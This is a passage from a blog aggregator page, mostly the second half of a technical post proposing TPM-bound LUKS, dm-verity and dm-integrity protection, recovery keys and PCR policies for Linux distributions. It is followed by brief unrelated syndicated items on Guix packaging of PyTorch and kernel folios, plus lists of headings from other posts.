i.e. the stuff you find in /usr/, i.e. the stuff traditionally
shipped to the user’s system via RPMs or DEBs.

I think there are three relevant ways how to authenticate this:

Make /usr/ a dm-verity volume. dm-verity is a concept
implemented in the Linux kernel that provides authenticity to
read-only block devices: every read access is cryptographically
verified against a top-level hash value. This top-level
hash is typically a 256bit value that you can either encode in the
kernel image you are using, or cryptographically sign (which is
particularly nice once this is
merged). I think
this is actually the best approach since it makes the /usr/ tree
entirely immutable in a very simple way. However, this also means
that the whole of /usr/ needs to be updated as once, i.e. the
traditional rpm/apt based update logic cannot work in this
mode.
Make /usr/ a dm-integrity volume. dm-integrity is a concept
provided by the Linux kernel that offers integrity guarantees to
writable block devices, i.e. in some ways it can be considered to be
a bit like dm-verity while permitting write access. It can be
used in three ways, one of which I think is particularly relevant
here. The first way is with a simple hash function in “stand-alone”
mode: this is not too interesting here, it just provides greater
data safety for file systems that don’t hash check their files’ data
on their own. The second way is in combination with dm-crypt,
i.e. with disk encryption. In this case it adds authenticity to
confidentiality: only if you know the right secret you can read and
make changes to the data, and any attempt to make changes without
knowing this secret key will be detected as IO error on next read
by those in possession of the secret (more about this below). The
third way is the one I think is most interesting here: in
“stand-alone” mode, but with a keyed hash function
(e.g. HMAC). What’s this good for? This provides authenticity
without encryption: if you make changes to the disk without knowing
the secret this will be noticed on the next read attempt of the
data and result in IO errors. This mode provides what we want
(authenticity) and doesn’t do what we don’t need (encryption). Of
course, the secret key for the HMAC must be provided somehow, I
think ideally by the TPM.
Make /usr/ a dm-crypt (LUKS) + dm-integrity volume. This
provides both authenticity and encryption. The latter isn’t
typically needed for /usr/ given that it generally contains no
secret data: anyone can download the binaries off the Internet
anyway, and the sources too. By encrypting this you’ll waste CPU
cycles, but beyond that it doesn’t hurt much. (Admittedly, some
people might want to hide the precise set of packages they have
installed, since it of course does reveal a bit of information
about you: i.e. what you are working on, maybe what your job is –
think: if you are a hacker you have hacking tools installed – and
similar). Going this way might simplify things in some cases, as it
means you don’t have to distinguish “OS binary resources” (i.e
/usr/) and “OS configuration and state” (i.e. /etc/ + /var/,
see below), and just make it the same volume. Here too, the secret
key must be provided somehow, I think ideally by the TPM.

All three approach are valid. The first approach has my primary
sympathies, but for distributions not willing to abandon client-side
updates via RPM/dpkg this is not an option, in which case I would
propose the other two approaches for these cases.

The LUKS encryption key (and in case of dm-integrity standalone mode
the key for the keyed hash function) should be bound to the TPM. Why
the TPM for this? You could also use a user password, a FIDO2 or
PKCS#11 security token — but I think TPM is the right choice: why
that? To reduce the requirement for repeated authentication, i.e. that
you first have to provide the disk encryption password, and then you
have to login, providing another password. It should be possible that
the system boots up unattended and then only one authentication prompt
is needed to unlock the user’s data properly. The TPM provides a way
to do this in a reasonably safe and fully unattended way. Also, when
we stop considering just the laptop use-case for a moment: on servers
interactive disk encryption prompts don’t make much sense — the fact
that TPMs can provide secrets without this requiring user interaction
and thus the ability to work in entirely unattended environments is
quite desirable. Note that
crypttab(5)
as implemented by systemd (v248) provides native support for
authentication via password, via TPM2, via PKCS#11 or via FIDO2, so
the choice is ultimately all yours.

How to Encrypt/Authenticate OS Configuration and State

Let’s now look at the OS configuration and state, i.e. the stuff in
/etc/ and /var/. It probably makes sense to not consider these two
hierarchies independently but instead just consider this to be the
root file system. If the OS binary resources are in a separate file
system it is then mounted onto the /usr/ sub-directory of the root
file system.

The OS configuration and state (or: root file system) should be both
encrypted and authenticated: it might contain secret keys, user
passwords, privileged logs and similar. This data matters and contains
plenty data that should remain confidential.

The encryption of choice here is dm-crypt (LUKS) + dm-integrity
similar as discussed above, again with the key bound to the TPM.

If the OS binary resources are protected the same way it is safe to
merge these two volumes and have a single partition for both (see
above)

How to Encrypt/Authenticate the User’s Home Directory

The data in the user’s home directory should be encrypted, and bound
to the user’s preferred token of authentication (i.e. a password or
FIDO2/PKCS#11 security token). As mentioned, in the traditional mode
of operation the user’s home directory is not individually encrypted,
but only encrypted because FDE is in use. The encryption key for that
is a system wide key though, not a per-user key. And I think that’s
problem, as mentioned (and probably not even generally understood by
our users). We should correct that and ensure that the user’s password
is what unlocks the user’s data.

In the systemd suite we provide a service
systemd-homed(8)
(v245) that implements this in a safe way: each user gets its own LUKS
volume stored in a loopback file in /home/, and this is enough to
synthesize a user account. The encryption password for this volume is
the user’s account password, thus it’s really the password provided at
login time that unlocks the user’s data. systemd-homed also supports
other mechanisms of authentication, in particular PKCS#11/FIDO2
security tokens. It also provides support for other storage back-ends
(such as fscrypt), but I’d always suggest to use the LUKS back-end
since it’s the only one providing the comprehensive confidentiality
guarantees one wants for a UNIX-style home directory.

Note that there’s one special caveat here: if the user’s home
directory (e.g. /home/lennart/) is encrypted and authenticated, what
about the file system this data is stored on, i.e. /home/ itself? If
that dir is part of the the root file system this would result in
double encryption: first the data is encrypted with the TPM root file
system key, and then again with the per-user key. Such double
encryption is a waste of resources, and unnecessary. I’d thus suggest
to make /home/ its own dm-integrity volume with a HMAC, keyed by
the TPM. This means the data stored directly in /home/ will be
authenticated but not encrypted. That’s good not only for performance,
but also has practical benefits: it allows extracting the encrypted
volume of the various users in case the TPM key is lost, as a way to
recover from dead laptops or similar.

Why authenticate /home/, if it only contains per-user home
directories that are authenticated on their own anyway? That’s a
valid question: it’s because the kernel file system maintainers made
clear that Linux file system code is not considered safe against rogue
disk images, and is not tested for that; this means before you mount
anything you need to establish trust in some way because otherwise
there’s a risk that the act of mounting might exploit your kernel.

Summary of Resources and their Protections

So, let’s now put this all together. Here’s a table showing the
various resources we deal with, and how I think they should be
protected (in my idealized world).

Resource	Needs Authentication	Needs Encryption	Suggested Technology	Validation/Encryption Keys/Certificates acquired via	Stored where
Shim	yes	no	SecureBoot signature verification	firmware certificate database	ESP
Boot loader	yes	no	ditto	firmware certificate database/shim	ESP/boot partition
Kernel	yes	no	ditto	ditto	ditto
initrd	yes	no	ditto	ditto	ditto
initrd parameters	yes	yes	systemd TPM encrypted credentials	TPM	ditto
initrd extensions	yes	no	`systemd-sysext` with Verity+PKCS#7 signatures	firmware/initrd certificate database	ditto
OS binary resources	yes	no	`dm-verity`	root hash linked into kernel image, or firmware/initrd certificate database	top-level partition
OS configuration and state	yes	yes	`dm-crypt` (LUKS) + `dm-integrity`	TPM	top-level partition
`/home/` itself	yes	no	`dm-integrity` with HMAC	TPM	top-level partition
User home directories	yes	yes	`dm-crypt` (LUKS) + `dm-integrity` in loopback files	User password/FIDO2/PKCS#11 security token	loopback file inside `/home` partition

This should provide all the desired guarantees: everything is
authenticated, and the individualized per-host or per-user data
is also encrypted. No double encryption takes place. The encryption
keys/verification certificates are stored/bound to the most appropriate
infrastructure.

Does this address the three attack scenarios mentioned earlier? I
think so, yes. The basic attack scenario I described is addressed by
the fact that /var/, /etc/ and /home/*/ are encrypted. Brute
forcing the former two is harder than in the status quo ante model,
since a high entropy key is used instead of one derived from a user
provided password. Moreover, the “anti-hammering” logic of the TPM
will make brute forcing prohibitively slow. The home directories are
protected by the user’s password or ideally a personal FIDO2/PKCS#11
security token in this model. Of course, a password isn’t better
security-wise then the status quo ante. But given the FIDO2/PKCS#11
support built into systemd-homed it should be easier to lock down
the home directories securely.

Binding encryption of /var/ and /etc/ to the TPM also addresses
the first of the two more advanced attack scenarios: a copy of the
harddisk is useless without the physical TPM chip, since the seed key
is sealed into that. (And even if the attacker had the chance to watch
you type in your password, it won’t help unless they possess access to
to the TPM chip.) For the home directory this attack is not addressed
as long as a plain password is used. However, since binding home
directories to FIDO2/PKCS#11 tokens is built into systemd-homed
things should be safe here too — provided the user actually possesses
and uses such a device.

The backdoor attack scenario is addressed by the fact that every
resource in play now is authenticated: it’s hard to backdoor the OS if
there’s no component that isn’t verified by signature keys or TPM
secrets the attacker hopefully doesn’t know.

For general purpose distributions that focus on updating the OS per
RPM/dpkg the idealized model above won’t work out, since (as
mentioned) this implies an immutable /usr/, and thus requires
updating /usr/ via an atomic update operation. For such distros a
setup like the following is probably more realistic, but see above.

Resource	Needs Authentication	Needs Encryption	Suggested Technology	Validation/Encryption Keys/Certificates acquired via	Stored where
Shim	yes	no	SecureBoot signature verification	firmware certificate database	ESP
Boot loader	yes	no	ditto	firmware certificate database/shim	ESP/boot partition
Kernel	yes	no	ditto	ditto	ditto
initrd	yes	no	ditto	ditto	ditto
initrd parameters	yes	yes	systemd TPM encrypted credentials	TPM	ditto
initrd extensions	yes	no	`systemd-sysext` with Verity+PKCS#7 signatures	firmware/initrd certificate database	ditto
OS binary resources, configuration and state	yes	yes	`dm-crypt` (LUKS) + `dm-integrity`	TPM	top-level partition
`/home/` itself	yes	no	`dm-integrity` with HMAC	TPM	top-level partition
User home directories	yes	yes	`dm-crypt` (LUKS) + `dm-integrity` in loopback files	User password/FIDO2/PKCS#11 security token	loopback file inside `/home` partition

This means there’s only one root file system that contains all of
/etc/, /var/ and /usr/.

Recovery Keys

When binding encryption to TPMs one problem that arises is what
strategy to adopt if the TPM is lost, due to hardware failure: if I
need the TPM to unlock my encrypted volume, what do I do if I need the
data but lost the TPM?

The answer here is supporting recovery keys (this is similar to how
other OSes approach this). Recovery keys are pretty much the same
concept as passwords. The main difference being that they are computer
generated rather than user-chosen. Because of that they typically have
much higher entropy (which makes them more annoying to type in, i.e
you want to use them only when you must, not day-to-day). By having
higher entropy they are useful in combination with TPM, FIDO2 or
PKCS#11 based unlocking: unlike a combination with passwords they do
not compromise the higher strength of protection that
TPM/FIDO2/PKCS#11 based unlocking is supposed to provide.

Current versions of
systemd-cryptenroll(1)
implement a recovery key concept in an attempt to address this
problem. You may enroll any combination of TPM chips, PKCS#11 tokens,
FIDO2 tokens, recovery keys and passwords on the same LUKS
volume. When enrolling a recovery key it is generated and shown on
screen both in text form and as QR code you can scan off screen if you
like. The idea is write down/store this recovery key at a safe place so
that you can use it when you need it. Note that such recovery keys can
be entered wherever a LUKS password is requested, i.e. after
generation they behave pretty much the same as a regular password.

TPM PCR Brittleness

Locking devices to TPMs and enforcing a PCR policy with this
(i.e. configuring the TPM key to be unlockable only if certain PCRs
match certain values, and thus requiring the OS to be in a certain
state) brings a problem with it: TPM PCR brittleness. If the key you
want to unlock with the TPM requires the OS to be in a specific state
(i.e. that all OS components’ hashes match certain expectations or
similar) then doing OS updates might have the affect of making your
key inaccessible: the OS updates will cause the code to change, and
thus the hashes of the code, and thus certain PCRs. (Thankfully, you
unrolled a recovery key, as described above, so this doesn’t mean you
lost your data, right?).

To address this I’d suggest three strategies:

Most importantly: don’t actually use the TPM PCRs that contain code
hashes. There are actually multiple PCRs
defined,
each containing measurements of different aspects of the boot
process. My recommendation is to bind keys to PCR 7 only, a PCR
that contains measurements of the UEFI SecureBoot certificate
databases. Thus, the keys will remain accessible as long as these
databases remain the same, and updates to code will not affect it
(updates to the certificate databases will, and they do happen too,
though hopefully much less frequent then code updates). Does this
reduce security? Not much, no, because the code that’s run is after
all not just measured but also validated via code signatures, and
those signatures are validated with the aforementioned certificate
databases. Thus binding an encrypted TPM key to PCR 7 should
enforce a similar level of trust in the boot/OS code as binding it
to a PCR with hashes of specific versions of that code. i.e. using
PCR 7 means you say “every code signed by these vendors is allowed
to unlock my key” while using a PCR that contains code hashes means
“only this exact version of my code may access my key”.
Use LUKS key management to enroll multiple versions of the TPM keys
in relevant volumes, to support multiple versions of the OS code
(or multiple versions of the certificate database, as discussed
above). Specifically: whenever an update is done that might result
changing the relevant PCRs, pre-calculate the new PCRs, and enroll
them in an additional LUKS slot on the relevant volumes. This means
that the unlocking keys tied to the TPM remain accessible in both
states of the system. Eventually, once rebooted after the update,
remove the old slots.
If these two strategies didn’t work out (maybe because the
OS/firmware was updated outside of OS control, or the update
mechanism was aborted at the wrong time) and the TPM PCRs changed
unexpectedly, and the user now needs to use their recovery key to
get access to the OS back, let’s handle this gracefully and
automatically reenroll the current TPM PCRs at boot, after the
recovery key checked out, so that for future boots everything is in
order again.

Other approaches can work too: for example, some OSes simply remove
TPM PCR policy protection of disk encryption keys altogether
immediately before OS or firmware updates, and then reenable it right
after. Of course, this opens a time window where the key bound to the
TPM is much less protected than people might assume. I’d try to avoid
such a scheme if possible.

Anything Else?

So, given that we are talking about idealized systems: I personally
actually think the ideal OS would be much simpler, and thus more
secure than this:

I’d try to ditch the Shim, and instead focus on enrolling the
distribution vendor keys directly in the UEFI firmware certificate
list. This is actually supported by all firmwares too. This has
various benefits: it’s no longer necessary to bind everything to
Microsoft’s root key, you can just enroll your own stuff and thus make
sure only what you want to trust is trusted and nothing else. To make
an approach like this easier, we have been working on doing automatic
enrollment of these keys from the systemd-boot boot loader, see
this work in progress for
details. This way the
Firmware will authenticate the boot loader/kernel/initrd without any
further component for this in place.

I’d also not bother with a separate boot partition, and just use the
ESP for everything. The ESP is required anyway by the firmware, and is
good enough for storing the few files we need.

FAQ

Can I implement all of this in my distribution today?

Probably not. While the big issues have mostly been addressed there’s
a lot of integration work still missing. As you might have seen I
linked some PRs that haven’t even been merged into our tree yet, and
definitely not been released yet or even entered the distributions.

Will this show up in Fedora/Debian/Ubuntu soon?

I don’t know. I am making a proposal how these things might work, and
am working on getting various building blocks for this into
shape. What the distributions do is up to them. But even if they don’t
follow the recommendations I make 100%, or don’t want to use the
building blocks I propose I think it’s important they start thinking
about this, and yes, I think they should be thinking about defaulting
to setups like this.

Work for measuring/signing initrds on Fedora has been started,
here’s a slide deck with some information about
it.

But isn’t a TPM evil?

Some corners of the community tried (unfortunately successfully to
some degree) to paint TPMs/Trusted Computing/SecureBoot as generally
evil technologies that stop us from using our systems the way we
want. That idea is rubbish though, I think. We should focus on what it
can deliver for us (and that’s a lot I think, see above), and
appreciate the fact we can actually use it to kick out perceived evil
empires from our devices instead of being subjected to them. Yes, the
way SecureBoot/TPMs are defined puts you in the driver seat if you
want — and you may enroll your own certificates to keep out everything
you don’t like.

What if my system doesn’t have a TPM?

TPMs are becoming quite ubiquitous, in particular as the upcoming
Windows versions will require them. In general I think we should focus
on modern, fully equipped systems when designing all this, and then
find fall-backs for more limited systems. Frankly it feels as if so
far the design approach for all this was the other way round: try to
make the new stuff work like the old rather than the old like the new
(I mean, to me it appears this thinking is the main raison d’être for
the Grub boot loader).

More specifically, on the systems where we have no TPM we ultimately
cannot provide the same security guarantees as for those which
have. So depending on the resource to protect we should fall back to
different TPM-less mechanisms. For example, if we have no TPM then the
root file system should probably be encrypted with a user provided
password, typed in at boot as before. And for the encrypted boot
credentials we probably should simply not encrypt them, and place them
in the ESP unencrypted.

Effectively this means: without TPM you’ll still get protection regarding the
basic attack scenario, as before, but not the other two.

What if my system doesn’t have UEFI?

Many of the mechanisms explained above taken individually do not
require UEFI. But of course the chain of trust suggested above requires
something like UEFI SecureBoot. If your system lacks UEFI it’s
probably best to find work-alikes to the technologies suggested above,
but I doubt I’ll be able to help you there.

rpm/dpkg already cryptographically validates all packages at installation time (`gpg`), why would I need more than that?

This type of package validation happens once: at the moment of
installation (or update) of the package, but not anymore when the data
installed is actually used. Thus when an attacker manages to modify
the package data after installation and before use they can make any
change they like without this ever being noticed. Such package download
validation does address certain attack scenarios
(i.e. man-in-the-middle attacks on network downloads), but it doesn’t
protect you from attackers with physical access, as described in the
attack scenarios above.

Systems such as ostree aren’t better than rpm/dpkg regarding this
BTW, their data is not validated on use either, but only during
download or when processing tree checkouts.

Key really here is that the scheme explained here provides offline
protection for the data “at rest” — even someone with physical access
to your device cannot easily make changes that aren’t noticed on next
use. rpm/dpkg/ostree provide online protection only: as long as the
system remains up, and all OS changes are done through the intended
program code-paths, and no one has physical access everything should
be good. In today’s world I am sure this is not good enough though. As
mentioned most modern OSes provide offline protection for the data at
rest in one way or another. Generic Linux distributions are terribly
behind on this.

This is all so desktop/laptop focused, what about servers?

I am pretty sure servers should provide similar security guarantees as
outlined above. In a way servers are a much simpler case: there are no
users and no interactivity. Thus the discussion of /home/ and what
it contains and of user passwords doesn’t matter. However, the
authenticated initrd and the unattended TPM-based encryption I think
are very important for servers too, in a trusted data center
environment. It provides security guarantees so far not given by Linux
server OSes.

I’d like to help with this, or discuss/comment on this

Submit patches or reviews through
GitHub. General discussion about
this is best done on the systemd mailing
list.

Elliot Page | Choosing Self-Love | Talks at Google

2021-09-23 Talks at Google

Post Syndicated from Talks at Google original https://www.youtube.com/watch?v=lG_fOLjKp_s

Courtès: What’s in a package

2021-09-22

Post Syndicated from original https://lwn.net/Articles/870047/rss

Over at the Guix-HPC blog, Ludovic Courtès writes about trying to package the PyTorch machine-learning library for the Guix distribution. Building from source in a user-verifiable manner is part of the philosophy behind Guix, but there were a number of problems that were encountered:

The first surprise when starting packaging PyTorch is that, despite being on PyPI, PyTorch is first and foremost a large C++ code base. It does have a setup.py as commonly found in pure Python packages, but that file delegates the bulk of the work to CMake.

The second surprise is that PyTorch bundles (or “vendors”, as some would say) source code for no less than 41 dependencies, ranging from small Python and C++ helper libraries to large C++ neural network tools. Like other distributions such as Debian, Guix avoids bundling: we would rather have one Guix package for each of these dependencies. The rationale is manifold, but it boils down to keeping things auditable, reducing resource usage, and making security updates practical.

[$] A discussion on folios

2021-09-22

Post Syndicated from original https://lwn.net/Articles/869942/rss

A few weeks ago, Matthew Wilcox might have guessed that his session
at the 2021 Linux
Plumbers Conference would be focused rather differently. But, as we reported earlier in September, his folio patch set ran into some, perhaps
unexpected, opposition and, ultimately, did not land in the mainline for
5.15. Instead of discussing how to use folios as part
of the File
Systems microconference, he led a discussion that was, at least in part, on the
path forward for them.

The challenge

Solution overview

Define a tag strategy

Apply tags to data assets

Define fine-grained permissions

Benefits

Conclusion

About the Authors

Why does operational resilience matter from a regulatory perspective?

What does it mean to be operationally resilient?

What is a game day?

How can game days help build operational resilience?

Stage 1 – Identify key services

Stage 2 – Map people, process, and technology supporting the business service

Stage 3 – Define and perform failure scenarios

Stage 4 – Observe and document people, process, and technology reactions

Stage 5 – Conduct lessons learned exercises

How to run your own game day in AWS

Conclusion

Related information:

Overview

URI support for RHOSTS

SMB examples

SSH examples

More examples

NEVER MISS A BLOG

Wrangler login and OAuth 2.0

Authorization Code Flow

Use what you need, only when you need it

Revoke access at any time

Security

What’s next

Packed with projects

Where can I buy it?

The Strange State of Authenticated Boot and Disk Encryption on Generic Linux Distributions

The Basic Technologies

How Linux Distributions use these Technologies

Attack Scenarios

Are we Safe?

Can we do better?

In Detail

How to Authenticate the initrd

How to Authenticate the Binary OS Resources

How to Encrypt/Authenticate OS Configuration and State

How to Encrypt/Authenticate the User’s Home Directory

Summary of Resources and their Protections

Recovery Keys

TPM PCR Brittleness

Anything Else?

FAQ

Can I implement all of this in my distribution today?

Will this show up in Fedora/Debian/Ubuntu soon?

But isn’t a TPM evil?

What if my system doesn’t have a TPM?

What if my system doesn’t have UEFI?

rpm/dpkg already cryptographically validates all packages at installation time (gpg), why would I need more than that?

This is all so desktop/laptop focused, what about servers?

I’d like to help with this, or discuss/comment on this

The collective thoughts of the interwebz

rpm/dpkg already cryptographically validates all packages at installation time (`gpg`), why would I need more than that?